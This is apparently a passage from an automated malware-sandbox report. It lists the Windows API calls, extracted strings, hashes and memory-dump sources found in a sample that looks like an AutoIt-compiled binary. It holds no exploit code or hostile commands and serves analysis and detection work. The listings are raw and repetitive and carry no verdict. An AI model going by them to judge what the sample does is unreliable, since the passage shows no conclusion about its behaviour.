                                              • Opcode ID: 2de90735afc916d3f085f8f94331c9d9605d670844d441b4b4bcfa56a3028687
                                              • Instruction ID: b65d0e660c3b6908785824a2ad278cb162583e289ec5dd8fbfd5ef4dd1780123
                                              • Opcode Fuzzy Hash: 2de90735afc916d3f085f8f94331c9d9605d670844d441b4b4bcfa56a3028687
                                              • Instruction Fuzzy Hash: 5171B270600205BEEB269F58DC45FABBF69FF06364F144216F625AA1E1C7716C60DB90
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 003B88D7
                                              • CoInitialize.OLE32(00000000), ref: 003B8904
                                              • CoUninitialize.OLE32 ref: 003B890E
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 003B8A0E
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B8B3B
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003D2C0C), ref: 003B8B6F
                                              • CoGetObject.OLE32(?,00000000,003D2C0C,?), ref: 003B8B92
                                              • SetErrorMode.KERNEL32(00000000), ref: 003B8BA5
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B8C25
                                              • VariantClear.OLEAUT32(?), ref: 003B8C35
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID: ,,=
                                              • API String ID: 2395222682-2941206825
                                              • Opcode ID: 83621b4678e4821fe6ba61ac336e4cd3c0c2b9bb4386185faf3f7850498704ac
                                              • Instruction ID: e868af2f9449b5f5743bb1f1d60f29dfe71fd8bd64660629035f618a37d67052
                                              • Opcode Fuzzy Hash: 83621b4678e4821fe6ba61ac336e4cd3c0c2b9bb4386185faf3f7850498704ac
                                              • Instruction Fuzzy Hash: 0CC104B1608305AFC702DF64C88496BBBE9FF89748F00495DFA8A9B251DB71ED05CB52
                                              APIs
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • _memset.LIBCMT ref: 0039786B
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003978A0
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003978BC
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003978D8
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00397902
                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0039792A
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00397935
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039793A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: 6fab71c79cfb133adea5565e42b9c8890ab49cd7f87f3de72e0998739bc5d4de
                                              • Instruction ID: b5a9df7422a49eba2d4d1085ec9c50316877ab9f3fdf9ce01c311910e6d79f6b
                                              • Opcode Fuzzy Hash: 6fab71c79cfb133adea5565e42b9c8890ab49cd7f87f3de72e0998739bc5d4de
                                              • Instruction Fuzzy Hash: 5841DA72C1462DABCF22EBA4DC85DEDB7B9FF04750F414069E915AB1A1DB316D08CB90
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: b3a3acecb730c2e9db847ef1fd28780e9b40c54ca102d5bb9807471018430565
                                              • Instruction ID: 9a00ae2e7d37060d315e90b973c980a99b478621e51a909da028d119bee59392
                                              • Opcode Fuzzy Hash: b3a3acecb730c2e9db847ef1fd28780e9b40c54ca102d5bb9807471018430565
                                              • Instruction Fuzzy Hash: 78415C3650028ACBCF1BEF50D892BEF3764AF21340F154419FC959B2A6DB30AD5ACB60
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0037E2A0,00000010,?,Bad directive syntax error,003CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0039F7C2
                                              • LoadStringW.USER32(00000000,?,0037E2A0,00000010), ref: 0039F7C9
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • _wprintf.LIBCMT ref: 0039F7FC
                                              • __swprintf.LIBCMT ref: 0039F81E
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0039F88D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 1506413516-4153970271
                                              • Opcode ID: c6fc4ee84afc586e0b8d4fc48e605840af564879fd065a4a58ef7bbbfbc70c6b
                                              • Instruction ID: c676967b94f8f4c4b720691f07f72d65a06cfb32ca1645801d3d8d66eef3068c
                                              • Opcode Fuzzy Hash: c6fc4ee84afc586e0b8d4fc48e605840af564879fd065a4a58ef7bbbfbc70c6b
                                              • Instruction Fuzzy Hash: 2A213E3290421EAFCF17AF90CC4AEEE7779BF18300F044465F515AA0A2DB71AA18DB50
                                              APIs
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                • Part of subcall function 00347924: _memmove.LIBCMT ref: 003479AD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003A5330
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003A5346
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003A5357
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003A5369
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003A537A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 44750db9bb879232e8efeb8c98eb24503fee9da31d72fcd652b40114f992f895
                                              • Instruction ID: 484252ee1ad452a8d6c0b46a3db1ccb8b7fb9fd42969710b192f0bb65af8baec
                                              • Opcode Fuzzy Hash: 44750db9bb879232e8efeb8c98eb24503fee9da31d72fcd652b40114f992f895
                                              • Instruction Fuzzy Hash: 80119431A5012D79DB26F762CC4AEFF7BBCEBD2B40F000429B511AA0D1EFA02D04C9A0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 252b8bb41932ff6c082486af4fa6b2a83487aaed37735caa3f80244ea290f988
                                              • Instruction ID: c1ca54b317f1237c84f903de9ae544267bf96922dacffe001c6b7921b4cb12cf
                                              • Opcode Fuzzy Hash: 252b8bb41932ff6c082486af4fa6b2a83487aaed37735caa3f80244ea290f988
                                              • Instruction Fuzzy Hash: BC11D531504114AFCB16AB309C46EEA77BCEB43711F0581B6F555D6091EFB29D818760
                                              APIs
                                              • timeGetTime.WINMM ref: 003A4F7A
                                                • Part of subcall function 0036049F: timeGetTime.WINMM(?,7608B400,00350E7B), ref: 003604A3
                                              • Sleep.KERNEL32(0000000A), ref: 003A4FA6
                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003A4FCA
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003A4FEC
                                              • SetActiveWindow.USER32 ref: 003A500B
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003A5019
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 003A5038
                                              • Sleep.KERNEL32(000000FA), ref: 003A5043
                                              • IsWindow.USER32 ref: 003A504F
                                              • EndDialog.USER32(00000000), ref: 003A5060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: 49a622af651f7b1490aac3945cd74f8182c4e76cbaf90f0e5cace3bbce4fc272
                                              • Instruction ID: 0c4af173f652fe2e60c341650bfd648482eb9fd4ec959b021ea9eca28dfab552
                                              • Opcode Fuzzy Hash: 49a622af651f7b1490aac3945cd74f8182c4e76cbaf90f0e5cace3bbce4fc272
                                              • Instruction Fuzzy Hash: 24218170205605BFE7139F20FE89E263BAEEB86749F061038F106D52B1CBB19D609F65
                                              APIs
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • CoInitialize.OLE32(00000000), ref: 003AD5EA
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003AD67D
                                              • SHGetDesktopFolder.SHELL32(?), ref: 003AD691
                                              • CoCreateInstance.OLE32(003D2D7C,00000000,00000001,003F8C1C,?), ref: 003AD6DD
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003AD74C
                                              • CoTaskMemFree.OLE32(?,?), ref: 003AD7A4
                                              • _memset.LIBCMT ref: 003AD7E1
                                              • SHBrowseForFolderW.SHELL32(?), ref: 003AD81D
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003AD840
                                              • CoTaskMemFree.OLE32(00000000), ref: 003AD847
                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003AD87E
                                              • CoUninitialize.OLE32(00000001,00000000), ref: 003AD880
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: a55a22fa2b29995e3c80f358e85d6a26ed58f92c764da88a87441445a9ee9c6a
                                              • Instruction ID: 491a315195de51b31f6fc0bc004f02903d5183a3cd448daf0bcf02d85191da8a
                                              • Opcode Fuzzy Hash: a55a22fa2b29995e3c80f358e85d6a26ed58f92c764da88a87441445a9ee9c6a
                                              • Instruction Fuzzy Hash: 22B1FA75A00109AFDB05DFA4C889EAEBBF9FF49304F148469E90ADB261DB31ED41CB50
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 0039C283
                                              • GetWindowRect.USER32(00000000,?), ref: 0039C295
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0039C2F3
                                              • GetDlgItem.USER32(?,00000002), ref: 0039C2FE
                                              • GetWindowRect.USER32(00000000,?), ref: 0039C310
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0039C364
                                              • GetDlgItem.USER32(?,000003E9), ref: 0039C372
                                              • GetWindowRect.USER32(00000000,?), ref: 0039C383
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0039C3C6
                                              • GetDlgItem.USER32(?,000003EA), ref: 0039C3D4
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0039C3F1
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0039C3FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                              • Instruction ID: 4165305b74f439ec945acedc083afcd5280860adf923a89363d4e2b14f6e17ba
                                              • Opcode Fuzzy Hash: b78ae0ea75e682d74c65d3ff3a96b2a340042ab13007e1ae0047397fac85d229
                                              • Instruction Fuzzy Hash: B6514E71B10205AFDF19CFA9DD99EAEBBBAEB88710F14852DF515D7290D770AD008B10
                                              APIs
                                                • Part of subcall function 00341B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00342036,?,00000000,?,?,?,?,003416CB,00000000,?), ref: 00341B9A
                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003420D3
                                              • KillTimer.USER32(-00000001,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0034216E
                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0037BCA6
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BCD7
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BCEE
                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003416CB,00000000,?,?,00341AE2,?,?), ref: 0037BD0A
                                              • DeleteObject.GDI32(00000000), ref: 0037BD1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                              • String ID:
                                              • API String ID: 641708696-0
                                              • Opcode ID: 516e1575af72b03777e960b811bb51c17de735356632651c1f0fc8fb6013d682
                                              • Instruction ID: 17555bf521f8a46a53e562194c4e03ad711e2f879e9ed45f5393c9efa8414972
                                              • Opcode Fuzzy Hash: 516e1575af72b03777e960b811bb51c17de735356632651c1f0fc8fb6013d682
                                              • Instruction Fuzzy Hash: 8B616832100A10DFDB37AF14DA48B2BB7F6FB40316F918529E546ABA60C774B891DF54
                                              APIs
                                                • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                              • GetSysColor.USER32(0000000F), ref: 003421D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: be06da1ad8080fd9cea4520ac7167fc424d62250d39c1a8d1fe8a7aef03bd212
                                              • Instruction ID: be86ec5145b063d98bef77f5641fcbbcc064999d1590c9c8f9d140691787faba
                                              • Opcode Fuzzy Hash: be06da1ad8080fd9cea4520ac7167fc424d62250d39c1a8d1fe8a7aef03bd212
                                              • Instruction Fuzzy Hash: 1841C431000554DFDB635F28EC88BBA3BAAEB06331F598265FE659E1E1C771AC41DB21
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,003CF910), ref: 003AA90B
                                              • GetDriveTypeW.KERNEL32(00000061,003F89A0,00000061), ref: 003AA9D5
                                              • _wcscpy.LIBCMT ref: 003AA9FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 06bdf1b5f374b6a7d0d4a5da5b0387757bae1b4733c5221a5f61cd8e7b475627
                                              • Instruction ID: 55b80bd0b453ffb13622150ea97b62481f932e370d0e81e91cc7fc6ba4be47c0
                                              • Opcode Fuzzy Hash: 06bdf1b5f374b6a7d0d4a5da5b0387757bae1b4733c5221a5f61cd8e7b475627
                                              • Instruction Fuzzy Hash: AE51BE325087059FC706EF14C892AAFB7E9EF86340F01482DF5959B2A2DB71ED09CA53
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: 32c699d04b2e8ab25bdc16b8cb07251d3706a5ccbe08f7ffd87342042c4844a6
                                              • Instruction ID: 7650405ea6f02e3db15d176c0e2266ba7a3c5a49eb8e67bf7a39ccd09f1a0660
                                              • Opcode Fuzzy Hash: 32c699d04b2e8ab25bdc16b8cb07251d3706a5ccbe08f7ffd87342042c4844a6
                                              • Instruction Fuzzy Hash: 3541C771604609AFDB26DF38D842F7B73E8FF46310F20846EE549DF295EA35A9418B10
                                              APIs
                                              • _memset.LIBCMT ref: 003C716A
                                              • CreateMenu.USER32 ref: 003C7185
                                              • SetMenu.USER32(?,00000000), ref: 003C7194
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7221
                                              • IsMenu.USER32(?), ref: 003C7237
                                              • CreatePopupMenu.USER32 ref: 003C7241
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C726E
                                              • DrawMenuBar.USER32 ref: 003C7276
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: c9ff0a714225e88eb7b4ddb7995775d4b4045bc64c5a7e89993d6ca7b141bd83
                                              • Instruction ID: 197ea64df4543893cb0cb2f54e73674332effbce5606847c29a5af8e52f63b7b
                                              • Opcode Fuzzy Hash: c9ff0a714225e88eb7b4ddb7995775d4b4045bc64c5a7e89993d6ca7b141bd83
                                              • Instruction Fuzzy Hash: 50412276A01205AFDB22DF64D988F9ABBB9FB49350F154429FE05A7360D731A910CF90
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003C755E
                                              • CreateCompatibleDC.GDI32(00000000), ref: 003C7565
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003C7578
                                              • SelectObject.GDI32(00000000,00000000), ref: 003C7580
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 003C758B
                                              • DeleteDC.GDI32(00000000), ref: 003C7594
                                              • GetWindowLongW.USER32(?,000000EC), ref: 003C759E
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003C75B2
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003C75BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
